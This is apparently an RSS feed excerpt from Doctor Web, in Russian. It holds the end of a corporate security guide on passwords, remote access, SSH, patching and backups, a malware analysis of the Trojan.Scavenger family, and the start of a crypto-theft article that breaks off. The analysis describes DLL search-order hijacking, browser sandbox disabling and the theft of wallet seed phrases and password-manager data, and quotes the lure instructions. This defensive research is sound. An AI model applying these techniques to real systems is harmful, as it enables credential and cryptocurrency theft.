&lt;h3&gt;Статистика «Доктор Веб»&lt;/h3&gt;

&lt;p&gt;
    С каждым годом все меньше случаев, когда удается криптоаналитическими методами подобрать ключ шифрования в случае инцидента с шифровальщиком. По нашей статистике, расшифровке поддаются около 1-2% случаев, с которыми к нам обращаются. Злоумышленники совершенствуют схемы и методы шифрования, используют исключительно надежные и криптостойкие алгоритмы. Как следствие, файлы становится невозможно расшифровать без получения уникальных криптостойких ключей, не поддающихся перебору за разумные периоды времени. 
&lt;/p&gt;

&lt;p&gt;
    Иногда зашифрованные данные невозможно расшифровать в принципе. Происходит это по абсолютно разным причинам. Например, злоумышленники могут допускать ошибки в алгоритме шифрования или в коде своих изделий, как результат — при шифровании файлы повреждаются или даже стираются. Другой вариант: хакеры просто не выходят на связь, и становится невозможным получить ключ расшифровки. Нередки случаи, когда ключ удается выкупить у злоумышленников, но он не подходит для расшифровки или подходит только для части данных, тем временем сами вирусописатели перестают выходить на связь. 
&lt;/p&gt;

&lt;p&gt;
    Напрашивается вывод: если данные уже зашифрованы преступником, то с высокой долей вероятности они потеряны безвозвратно, даже если пострадавший согласится заплатить выкуп. Нельзя забывать, что целью некоторых известных группировок является преднамеренное повреждение данных, а не вымогательство и получение за них выкупа. Необходимо принять меры к защите корпоративной сети от проникновения злоумышленников, меры для своевременного обнаружения такого вторжения, меры, препятствующие выполнению злоумышленником вредоносных действий. Они должны быть дополнены мерами, направленными на минимизацию нанесенного ущерба и быстрое восстановление информационной системы после подобного инцидента. Иными словами, необходимо со всей возможной тщательностью застраховаться на случай подобного киберинцидента.
&lt;/p&gt;

&lt;p&gt;
    По нашей статистике, наиболее частый и распространенный вектор атаки — несанкционированное получение удаленного доступа – причем последний может быть не только с помощью RDP, но и VNC или программы для удаленного управления (например, RAdmin, Ammyy Admin и пр.). Возможны разные способы получения этого доступа. Самый распространенный — это банальный подбор пароля или его утечка (через подкуп сотрудника, фишинг, намеренный саботаж или халатность). Реже встречается использование уязвимостей ОС или критичного софта, содержащего данные уязвимости (MS Exchange, MS SQL Server и т.д.). Еще реже — банальное скачивание вируса из внешней сети, в том числе через почтовый фишинг или другое несознательное действие. 
&lt;/p&gt;

&lt;p&gt;
    Также следует иметь в виду, что многократное использование одинакового пароля для разных сервисов означает, что в случае его утечки компрометации подвергаются сразу все сервисы, где он используется. Именно с попыток перебора таких скомпрометированных паролей нередко начинаются сценарии проникновения злоумышленников в периметр организации. Иными словами, каждый используемый пароль должен быть уникальным: применяться только в одном сервисе и нигде более.
&lt;/p&gt;

&lt;p&gt;
    Особняком стоят целевые атаки на предприятия, когда могут применяться все вышеперечисленные методы вместе взятые. Иногда для целевой атаки на одну компанию злоумышленники совершают несанкционированный удаленный доступ в сеть других компаний, например, дочерней организации, поставщика услуг или партнера. Такой «заход» нужен, чтобы обеспечить доверие, а затем успешно осуществить фишинговую атаку и получить точку входа. В таких случаях само по себе заражение или шифрование — не самоцель. Злоумышленникам достаточно разместить в системе цели некий уязвимый драйвер или библиотеку, так называемую «закладку», через которую они впоследствии удаленно смогут получать интересующую информацию о сети компании, а также распространять своё влияние глубже. В таком режиме хакеры могут незамеченными находиться в сети предприятия месяцами или годами и не вести никакой явной вирусной деятельности. Однако, любой серьезный анализ или аудит критичных систем в этот период с большой степенью вероятности покажет присутствие незваных гостей.
&lt;/p&gt;

&lt;p&gt;
    На основе многолетнего опыта работы нашей службы технической поддержки и департамента по расшифровке файлов, мы разработали рекомендации для усиления безопасности ИТ-инфраструктуры на предприятиях.
&lt;/p&gt;

&lt;h3&gt;
    Общие рекомендации 
&lt;/h3&gt;

&lt;div class="center"&gt;
    &lt;a target="_blank" href="https://st.drweb.kz/static/new-www/news/2025/august/recommentd_it.pdf" class='btn' download&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;
    Главное: принципиально — провести аудит всей системы и определить основные критичные точки, без защиты которых компания не сможет существовать, а затем — сконцентрироваться на них в первую очередь.
&lt;/p&gt;

&lt;ol&gt;
    &lt;li&gt;
        &lt;b&gt;Проведите ревизию учетных записей (УЗ) вашей сети. Заблокируйте все  неиспользуемые УЗ. Для всех используемых административных УЗ поменяйте пароли или убедитесь, что установлен надежный пароль. &lt;/b&gt;

        &lt;ul class="list"&gt;
            &lt;li&gt;
                Важно обеспечить сложность пароля. Главные требования к паролям всем известны: длина не менее 8 символов, с обязательным использованием букв разного регистра, цифр и специальных символов. 
            &lt;/li&gt;
            &lt;li&gt;
                Архиважно: пароль должен быть уникальным. Ни в коем случае он не должен был использоваться где-либо ранее: на сторонних сайтах или сервисах. Пользователи склонны использовать устоявшиеся пароли, но при этом не отслеживают своевременно все возможные утечки баз данных с паролями. Больше того, об этих утечках не всегда известно. А они происходят регулярно. Любой вполне надежный пароль, установленный пользователем на стороннем сервисе несколько месяцев назад, вполне может оказаться в одной из свежих украденных баз данных, что позволит злоумышленникам получить удаленный доступ. Вывод прост: лучше забыть и восстановить пароль, нежели подвергнуть компрометации всю сеть предприятия. 
            &lt;/li&gt;
            &lt;li&gt;
                Также может быть полезно использовать сервисы вроде Have I Been Pwned, если это не противоречит политике безопасности компании. Применение таких сервисов позволит выявлять случаи утечек паролей пользователей.
            &lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;

    &lt;li&gt;
        &lt;p&gt;&lt;b&gt;Проверьте степень защищенности доступа по протоколу RDP&lt;/b&gt; (Remote Desktop Protocol, протокол удалённого рабочего стола) &lt;b&gt;или другого программного обеспечения для удаленного доступа (если они используются)&lt;/b&gt;. На сегодня при наличии установленного и работающего в системе антивируса случаи шифрования файлов практически не встречаются. Самая распространенная схема — компрометация удаленного доступа, получение повышенных привилегий в системе, удаление антивируса или его отключение, за которыми следует запуск вспомогательных утилит и шифровальщика. То есть, речь идет о комплексных атаках с использованием различных техник.
        &lt;/p&gt;
        &lt;p&gt;
            Если в вашей организации используется RDP, то доступ к нему должен быть надежно защищен. Все учетные записи, которые используются для подключения, должны быть под контролем. В обязательном порядке они должны иметь длинный, уникальный и сложный пароль, который невозможно подобрать ни простым перебором, ни перебором по словарям. Все неактуальные учетные записи должны быть отключены.
        &lt;/p&gt;
        &lt;p&gt;
            Если это возможно, дополнительно RDP (а равно VNC и прочие способы удаленного подключения) канал стоит скрыть за VPN. Если это невозможно, то на внешнем оборудовании — роутере или шлюзе — необходимо настроить ограничение на удаленное подключение, оставив возможность подключаться удаленно только с определенных IP или подсетей. Также стоит рассмотреть лучшие практики по защите средств удаленного доступа от несанкционированного подключения. Включение и просмотр аудита удаленных подключений, ограничение числа подключений при неудачном вводе пароля более определенного числа раз и замена стандартного порта заметно осложнят злоумышленникам процесс и заметно снизят вероятность успешного входа.
        &lt;/p&gt;
        &lt;p&gt;
            Нужно осознавать: при компрометации удаленного доступа система практически обречена. И ни один антивирус уже не сможет полноценно защитить систему и сеть предприятия от последствий. При инцидентах такого рода злоумышленники чаще всего удаляют антивирус или выводят его из строя. Но иногда хакеры могут не использовать никаких вредоносных утилит, чтобы похитить и затем зашифровать данные. В этом случае им не придется удалять антивирус, так как невозможно будет отличить злонамеренные действия от действий легитимного администратора. Нередки случаи, когда при подобных инцидентах файлы либо упаковываются в обычные архивы с длинным неизвестным паролем, либо скачиваются на внешние серверы, а оригиналы из системы полностью удаляются. Также для шифрования могут использоваться системные средства, такие, как Windows Bitlocker. В последнем случае никаких вредоносных действий относительно системы и  антивируса не выполняется в принципе, только стандартные пользовательские или административные операции. Еще один вывод: к обеспечению  информационной безопасности компании необходимо подходить комплексно.
        &lt;/p&gt;
    &lt;/li&gt;

    &lt;li&gt;
        &lt;b&gt;Проверьте настройку удаленного доступа к серверам Linux и выполните основные рекомендации по настройкам SSHD:&lt;/b&gt;

        &lt;ul class="list"&gt;
            &lt;li&gt;
                Запретите использование входа по паролю — применяйте только SSH ключи, сами ключи при этом защищайте паролем (В принципе, ключ можно сохранить без пароля и подключаться по нему далее без пароля. Но мы не рекомендуем этот способ). Ключи лучше хранить на внешнем носителе информации и подключать к компьютеру по необходимости.
            &lt;/li&gt;
            &lt;li&gt;
                Запретите возможность непосредственного входа по SSH под учетной записью root. При необходимости повышения привилегий в пользовательской сессии используйте sudo.
            &lt;/li&gt;
            &lt;li&gt;
                Ограничьте перечень пользователей, имеющих право подключения по SSH.
            &lt;/li&gt;
            &lt;li&gt;
                На уровне системного межсетевого экрана установите — по умолчанию — для всех подключений политику на отклонение входящих подключений. Избранные порты должны быть открыты для подключений только в случае необходимости. Разрешить для подключений из общей сети только публичные сервисы (например, http/https, smtp). Чувствительные сервисы (например, SSH) нужно ограничивать подключениями через VPN.
            &lt;/li&gt;
            &lt;li&gt;
                Для любых сервисов типа СУБД (mysql, postresql, redis, mongodb и т.п.) исключите возможность подключения с внешних адресов. Эти подключения должны осуществляться строго с доверенных адресов (локальная сеть или VPN).
            &lt;/li&gt;
            &lt;li&gt;
                Избегайте настроек сервисов, открывающих входящие подключения на интерфейсе 0.0.0.0. Это допустимо только для публичных сервисов, для всех иных должен использоваться непубличный интерфейс (локальная сеть или VPN).
            &lt;/li&gt;
            &lt;li&gt;
                Включите аудит действий пользователей (auditd) и настройте уведомление об активности root или sudo — например, через отправку на электронную почту.
            &lt;/li&gt;
            &lt;li&gt;
                Ограничьте возможность выполнения скриптов в /tmp и других временных каталогов через параметры монтирования noexec, nosuid, nodev – однако следует помнить, что такие ограничения могут оказать влияние на легитимные процессы (например, установщики прикладного ПО), поэтому нужно быть внимательным при применении данной рекомендации.
            &lt;/li&gt;
            &lt;li&gt;
                Разнесите системные каталоги по разным разделам (/var, /home, /tmp) для ограничения последствий при их переполнении.
            &lt;/li&gt;
            &lt;li&gt;
                Удалите все неиспользуемые сервисы, установленные из шаблона ОС (telnet, ftp, rsh, nfs и т.д.). Ненужные службы, которые не удалены, отключите (systemctl disable или иным аналогичным способом).
            &lt;/li&gt;
            &lt;li&gt;
                Ограничьте использование sudo только разрешенными пользователями (настройкой sudoers).
            &lt;/li&gt;
            &lt;li&gt;
                Рассмотрите возможность использования дополнительных методов аутентификации по SSH, таких, как Google Authenticator или аналоги. Любой 2FA метод многократно снизит риск несанкционированного подключения.
            &lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;b&gt;Проверьте саму систему и критичное ПО на известные уязвимости. По возможности используйте наиболее актуальные сборки операционной системы (ОС) и прикладного ПО. Установите все последние обновления к ним. &lt;/b&gt;&lt;/p&gt;
        &lt;p&gt;
            Эксплойты операционной системы и широко распространенного софта могут являться лазейкой для получения доступа к  системе в обход любых методов защиты. Чем старее парк используемых ОС, тем выше риск компрометации. Для современных ОС, в первую очередь, всегда должно быть включено автоматическое обновление. Но главное: это обновление должно на деле проводиться. Это касается любого критичного софта, как, например, различных СУБД, почтовых серверов и клиентов, ПО для проектирования, моделирования, или любого другого. Обновления должны быть плановыми и систематическими, чтобы выход очередной 0-day уязвимости не застал пользователей врасплох и не стал причиной компрометации всей сети в обход любого антивирусного ПО. 
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;b&gt;Защитите антивирус от удаления и обновите его до актуальной версии. &lt;/b&gt;&lt;/p&gt;
        &lt;p&gt;
            Антивирусное ПО должно быть установлено на всех машинах сети. Сегодня практически не встречаются случаи, когда при установлении антивируса вместе с ним в систему был успешно занесен и запущен троян-шифровальщик. Первое, что делают злоумышленники при удаленном проникновении в систему – пытаются отключить, удалить или иначе вывести из строя любое антивирусное ПО. Везде, где это возможно, необходимо установить запрет на удаление антивируса локально (если используется версия антивируса Dr.Web с централизованным управлением), запрет на отключение самозащиты (также если используется версия антивируса Dr.Web с централизованным  управлением) и пароль для доступа к его настройкам. В случае компрометации удаленного подключения такие ограничения повышают шансы успешно защититься и осложняют задачу злоумышленникам, давая администраторам время среагировать на атаку.
        &lt;/p&gt;
        &lt;p&gt;
            Любая рабочая станция без антивируса или с антивирусом, в котором не обновляются компоненты и базы, создает опасность для всей остальной сети. Особенно, если эта машина доступна из внешней сети. 
        &lt;/p&gt;
        &lt;p&gt;
            При использовании централизованных версий антивируса Dr.Web под Windows так же рекомендуется рассмотреть возможность использования Контроля приложений, входящего в состав центра управления Dr.Web и антивирусных агентов, начиная с 12 версии. При корректной настройке, в системе в принципе  невозможен будет запуск любых действий не авторизованных администратором. 
        &lt;/p&gt;
    &lt;/li&gt;

    &lt;li&gt;
        &lt;p&gt;&lt;b&gt;Регламентируйте проведение процедуры регулярного резервного копирования&lt;/b&gt; (бэкапа). &lt;b&gt;Это наиважнейший принцип защиты.&lt;/b&gt;  Правильно организованная система  резервного копирования является основным средством защиты как от шифровальщиков, так и от других проблем, связанных с повреждением данных и выходом оборудования из строя. Серьезная ошибка, которую допускают многие администраторы в реальных инцидентах — хранение резервных копий в той же сети или системе, в которой эти копии создаются. Недостаточно просто сделать резервную копию одной системы на некоем соседнем сервере, без дополнительных манипуляций. При киберинциденте, и, в частности, при шифровании данных, с высокой степенью вероятностью эти резервные копии окажутся зашифрованными наряду со всеми остальными данными в системе. Именно такое течение инцидентов мы и видим на практике в обращениях пользователей, которые до нас доходят. При шифровании данных, бэкапы в сети — одна из первых целей злоумышленников. &lt;/p&gt;
        &lt;p&gt;
            Резервное копирование ценной информации должно выполняться на носители, которые недоступны для записи из основных систем, где хранятся оригиналы. Ни с одной рабочей станции в сети не должно быть одновременного доступа к записи и чтению всех существующих бэкапов. В любой момент времени должно существовать хотя бы две, а лучше три резервные копии корпоративных данных, без которых предприятие не сможет функционировать. Как минимум одна из этих копий должна быть полностью изолирована от остальной сети. В план резервного копирования обязательно нужно добавлять периодическую проверку восстановления из резервной копии. То есть, резервная копия не только должна просто существовать, но должна быть целостной, а администраторы должны иметь возможность и практический навык по быстрому восстановлению работоспособности сети из данного бэкапа. При применении такого протокола, во-первых, в критической ситуации персонал будет иметь натренированный опыт данной операции, что заметно сократит период восстановления, а, во-вторых, позволит избежать ситуации, когда ввиду некорректной настройки параметров данные из резервной копии невозможно восстановить. 
        &lt;/p&gt;
    &lt;/li&gt;

    &lt;li&gt;
        &lt;p&gt;Мы настоятельно рекомендуем &lt;b&gt;разработать план аварийного восстановления и периодически устраивать учения&lt;/b&gt;. Персонал должен иметь инструкции на случай возникновения недопустимых последствий, а руководитель должен быть уверен в том, что этот план жизнеспособен. &lt;/p&gt;
        &lt;p&gt;Из практики нам известно, что организация полноценной автоматизированной системы резервного копирования может быть сопряжена с рядом трудностей. Однако, нельзя полностью игнорировать эту процедуру, так как добиться результата можно и с использованием минимальных средств. Даже банальное ручное копирование бухгалтерской 1С базы и ряда важных документов на usb-накопитель, пусть даже раз в неделю, многократно снизит возможные финансовые, правовые и репутационные последствия от потери всей совокупности данных. &lt;/p&gt;
    &lt;/li&gt;
&lt;/ol&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15036&amp;lng=kk</guid><title>Геймерам приготовиться: под видом читов и модов мошенники распространяют Trojan.Scavenger для кражи криптовалюты и паролей</title><link>https://news.drweb.kz/show/?i=15036&amp;lng=kk&amp;c=23</link><pubDate>Tue, 22 Jul 2025 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;22 июля 2025 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Антивирусная лаборатория «Доктор Веб» обнаружила семейство вредоносных программ Trojan.Scavenger, с помощью которых злоумышленники похищают конфиденциальные данные из криптокошельков и менеджеров паролей у пользователей ОС Windows. В заражении компьютеров участвует несколько троянов семейства,  при этом для их запуска используются легитимные приложения, в том числе в них эксплуатируются уязвимости класса DLL Search Order Hijacking.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;Введение&lt;/h3&gt;
&lt;p&gt;
    В 2024 году компания «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=14899" target="_blank"&gt;расследовала инцидент информационной безопасности&lt;/a&gt;, 
    связанный с попыткой проведения целевой атаки на одно из российских предприятий. 
    Схема атаки включала применение вредоносного ПО, которое для заражения целевой 
    системы эксплуатировало уязвимость к перехвату порядка поиска DLL (DLL Search Order Hijacking) 
    в популярном веб-браузере. При запуске Windows-приложения производят поиск необходимых для 
    работы библиотек в различных хранилищах и в определенной последовательности. Чтобы «обмануть» 
    программы, злоумышленники размещают вредоносные DLL-файлы там, где поиск будет выполняться 
    в первую очередь — например, в каталоге установки целевого ПО. При этом троянским файлам 
    даются имена легитимных библиотек, которые располагаются в менее приоритетных для поиска директориях. 
    В результате уязвимые программы при старте первыми загружают именно вредоносные DLL. Те работают как их составная часть и получают такие же права.
&lt;/p&gt;
&lt;p&gt;
    По следам рассмотренного инцидента наши специалисты внедрили в антивирусные продукты Dr.Web функциональность, 
    которая позволяет отслеживать и предотвращать попытки эксплуатации уязвимостей к перехвату порядка поиска DLL. 
    При изучении телеметрии данной функции вирусные аналитики «Доктор Веб» выявили попытки загрузки неизвестного ранее 
    ВПО сразу в несколько браузеров наших клиентов. Изучение этих случаев и позволило обнаружить новую 
    хакерскую кампанию, о которой пойдет речь в настоящем материале.
&lt;/p&gt;
&lt;p&gt;
    Заражение компьютеров вредоносными программами &lt;b&gt;Trojan.Scavenger&lt;/b&gt; является многоступенчатым и начинается 
    с троянов-загрузчиков, попадающих в целевые системы различными способами. Наши специалисты выявили две 
    цепочки данной кампании с разным числом задействованных троянских компонентов.
&lt;/p&gt;

&lt;h3&gt;Цепочка из трех загрузчиков&lt;/h3&gt;
&lt;p&gt;
    В этой цепочке заражения стартовым компонентом является вредоносная программа &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt;, 
    представляющая собой динамическую библиотеку (DLL). Она может распространяться как в составе пиратских игр, 
    так и под видом различных игровых патчей, читов и модов через торренты и посвященные игровой тематике сайты. 
    Далее мы рассмотрим пример, где мошенники выдают трояна за патч.
&lt;/p&gt;
&lt;p&gt;
    &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt; распространяется в ZIP-архиве вместе с инструкцией по установке. В ней злоумышленники 
    побуждают потенциальную жертву поместить «патч» в каталог с игрой Oblivion Remastered — якобы для улучшения ее производительности:
&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p style="margin-top: 20px;"&gt;
    Имя вредоносного файла выбрано атакующими не случайно: в ОС Windows легитимный файл с именем &lt;span class="string"&gt;umpdc.dll&lt;/span&gt;
    располагается в системном каталоге &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;. Он является частью графического API, которое используют 
    различные программы, в том числе игры. Если в установленной у жертвы версии игры присутствует незакрытая уязвимость, копируемый 
    троянский файл будет автоматически запускаться вместе ней. Стоит отметить, что актуальная на момент проведения исследования версия 
    игры Oblivion Remastered корректно обрабатывала очередность поиска библиотеки &lt;span class="string"&gt;umpdc.dll&lt;/span&gt;, поэтому в рассматриваемом 
    примере &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt; не мог автоматически запуститься с ней и продолжить цепочку заражения.
&lt;/p&gt;
&lt;p&gt;
    При успешном старте троян скачивает с удаленного сервера и запускает следующую стадию — загрузчика &lt;b&gt;Trojan.Scavenger.2&lt;/b&gt; (&lt;span class="string"&gt;tmp6FC15.dll&lt;/span&gt;). 
    Тот в свою очередь скачивает и устанавливает в систему другие модули семейства — &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; и &lt;b&gt;Trojan.Scavenger.4&lt;/b&gt;.
&lt;/p&gt;
&lt;p&gt;
    &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; представляет собой динамическую библиотеку &lt;span class="string"&gt;version.dll&lt;/span&gt;, которая копируется в каталог одного из целевых браузеров, 
    построенных на базе движка Chromium. Она имеет такое же имя, как и одна из системных библиотек в директории &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;. 
    Уязвимые к перехвату порядка поиска DLL браузеры не проверяют, откуда загружается библиотека с таким именем. А поскольку троянский файл находится 
    в их каталоге, он имеет приоритет над легитимной системной библиотекой и загружается первым. Наши вирусные аналитики зафиксировали попытки эксплуатации 
    данной уязвимости в браузерах Google Chrome, Microsoft Edge, Яндекс Браузере и Opera.
&lt;/p&gt;
&lt;p&gt;
    После старта &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; отключает защитные механизмы целевого браузера — например, запуск его песочницы, — 
    в результате чего в нем пропадает изоляция выполняемого JS-кода. Кроме того, троян отключает проверку расширений в 
    браузере. Для этого он определяет соответствующую библиотеку Chromium по наличию в ней экспортируемой функции 
    &lt;span class="string"&gt;CrashForExceptionInNonABICompliantCodeRange&lt;/span&gt;. Затем он выполняет поиск процедуры проверки расширений 
    в этой библиотеке и вносит соответствующий патч.
&lt;/p&gt;
&lt;p&gt;
    Далее троян модифицирует установленные в браузере целевые расширения, получая необходимые модификации в виде JavaScript-кода с C2-сервера. Изменениям подвергаются:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        криптокошельки
        &lt;ul&gt;
            &lt;li&gt;Phantom&lt;/li&gt;
            &lt;li&gt;Slush&lt;/li&gt;
            &lt;li&gt;MetaMask&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
    &lt;li&gt;
        менеджеры паролей
        &lt;ul&gt;
            &lt;li&gt;Bitwarden&lt;/li&gt;
            &lt;li&gt;LastPass&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
    При этом модифицируются не оригиналы, а копии, которые троян предварительно помещает в каталог &lt;span class="string"&gt;%TEMP%/ServiceWorkerCache&lt;/span&gt;. 
    А чтобы браузер «подхватил» измененные расширения, &lt;b&gt;Trojan.Scavenger.3&lt;/b&gt; перехватывает управление функциями &lt;span class="string"&gt;CreateFileW&lt;/span&gt; и 
    &lt;span class="string"&gt;GetFileAttributesExW&lt;/span&gt;, подменяя локальные пути к оригинальным файлам на пути к модификациям (Dr.Web детектирует их как &lt;b&gt;Trojan.Scavenger.5&lt;/b&gt;).
&lt;/p&gt;
&lt;p&gt;Сами модификации представлены двумя вариантами:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;добавляется временная метка к Cookie;&lt;/li&gt;
    &lt;li&gt;добавляется отправка пользовательских данных на C2-сервер.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
   Из криптокошельков Phantom, Slush и MetaMask злоумышленникам передаются приватные ключи и мнемонические фразы. 
   От менеджера паролей Bitwarden им отправляется Cookie авторизации, а от LastPass — добавляемые жертвами пароли. 
&lt;/p&gt;
&lt;p&gt;
    В свою очередь, &lt;b&gt;Trojan.Scavenger.4 &lt;/b&gt; (&lt;span class="string"&gt;profapi.dll&lt;/span&gt;) копируется в каталог с приложением криптокошелька Exodus. 
    Троян запускается автоматически вместе с данной программой, также эксплуатируя в ней уязвимость DLL Search Order Hijacking 
    (легитимная системная библиотека &lt;span class="string"&gt;profapi.dll&lt;/span&gt; находится в директории &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;, 
    но из-за уязвимости приоритет загрузки при запуске кошелька отдается троянскому файлу).
&lt;/p&gt;
&lt;p&gt;
    После старта &lt;b&gt;Trojan.Scavenger.4&lt;/b&gt; перехватывает функцию &lt;span class="string"&gt;v8::String::NewFromUtf8&lt;/span&gt; из движка V8 для работы с JavaScript и WebAssambly. 
    С ее помощью вредоносная программа отслеживает JSON, сформированные целевым приложением, и может получать различные пользовательские данные. 
    В случае с программой Exodus троян ищет JSON, в котором присутствует ключ &lt;span class="string"&gt;passphrase&lt;/span&gt;, после чего считывает его значение. 
    В результате он получает пользовательскую мнемоническую фразу, которой можно расшифровать или сгенерировать приватный ключ от криптокошелька жертвы. 
    Далее троян находит приватный ключ &lt;span class="string"&gt;seed.seco&lt;/span&gt; от криптокошелька, считывает его и вместе с ранее полученной мнемонической фразой отправляет на C2-сервер.
&lt;/p&gt;

&lt;h3&gt;Цепочка из двух загрузчиков&lt;/h3&gt;
&lt;p&gt;
    Данная цепочка в целом идентична первой, однако в распространяемых архивах с «патчами» и «читами» к играм вместо &lt;b&gt;Trojan.Scavenger.1&lt;/b&gt; 
    находится модифицированная версия &lt;b&gt;Trojan.Scavenger.2&lt;/b&gt;, представленная не в качестве DLL-файла, а в виде файла с расширением 
    &lt;span class="string"&gt;.ASI&lt;/span&gt; (фактически это динамическая библиотека с измененным расширением).
&lt;/p&gt;
&lt;p&gt;
    Архив также сопровождается инструкциями по установке:
&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;
    После того как пользователь копирует файл в указанную директорию, тот будет автоматически запускаться при 
    старте целевой игры, которая будет воспринимать его как свой плагин. С этого момента цепочка заражения повторяет шаги из первого варианта.
&lt;/p&gt;

&lt;h3&gt;Особенности семейства&lt;/h3&gt;
&lt;p&gt;
    Большинство троянов семейства имеет ряд общих признаков. Одним из них является стандартная процедура проверки окружения 
    на предмет работы в виртуальной среде или в режиме отладки. Если трояны обнаруживают признаки искусственной среды, они завершают работу.
&lt;/p&gt;
&lt;p&gt;
    Другой характерный признак семейства — единый алгоритм общения с управляющим сервером. 
    Для связи с ним трояны проходят этап создания ключа и проверки шифрования. Он состоит из отправки двух запросов. 
    Первый необходим для получения части ключа, который используется для шифрования некоторых параметров и данных в определенных запросах. 
    Второй выполняется с целью проверки ключа и содержит определенные параметры, такие как случайным образом сгенерированная строка, 
    текущее время и зашифрованное значение времени. На него C2-сервер отвечает полученной ранее строкой. Все последующие запросы содержат 
    параметры времени, и при их отсутствии сервер отказывается выполнять соединение.
&lt;/p&gt;
&lt;p&gt;
    Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».
&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger.1&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger.2&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger.2&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger.3&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger.4&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger.4&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger.5&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;Заключение&lt;/h3&gt;
&lt;p&gt;
    Мы уведомили разработчиков, в чьем ПО эксплуатировались выявленные бреши в безопасности, 
    однако они сочли уязвимости типа DLL Search Order Hijacking не требующими исправления. 
    Но внедренная в антивирусные продукты Dr.Web защита от атак данного типа успешно 
    противодействовала эксплуатации уязвимостей в затронутых браузерах еще до того, как мы узнали 
    о семействе вредоносных программ &lt;b&gt;Trojan.Scavenger&lt;/b&gt;, поэтому нашим пользователям эти трояны не угрожали. 
    А в рамках проведенного исследования под эту защиту было также добавлено и приложение криптокошелька Exodus.
&lt;/p&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Scavenger" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;
</description></item><item><guid>https://news.drweb.kz/show/?i=15002&amp;lng=kk</guid><title>Вот и поговорили: что связывает сомнительного качества Android-смартфоны, WhatsApp и кражу криптовалюты?</title><link>https://news.drweb.kz/show/?i=15002&amp;lng=kk&amp;c=23</link><pubDate>Mon, 14 Apr 2025 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;14 апреля 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;С каждым годом криптовалюты становятся все более привычным методом оплаты. По данным на 2023 год в развитых странах примерно 20% населения когда-либо использовали такие средства платежа, а в развивающихся странах, где банковский сектор не отвечает потребностям населения, число пользователей криптовалют достигает еще больших значений. В рейтингах принятия криптовалют по количеству пользователей Россия находится в первой десятке стран. Анонимность и быстрота платежей, глобальный доступ и низкие комиссии за переводы являются основными преимуществами, которые привлекают рядовых пользователей. А для мошенников особый интерес представляют необратимость транзакций, отсутствие регуляции и недостаток знаний у пользователей ввиду относительной новизны криптовалютной технологии, что позволяет реализовывать самые разнообразные схемы незаконного обогащения.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

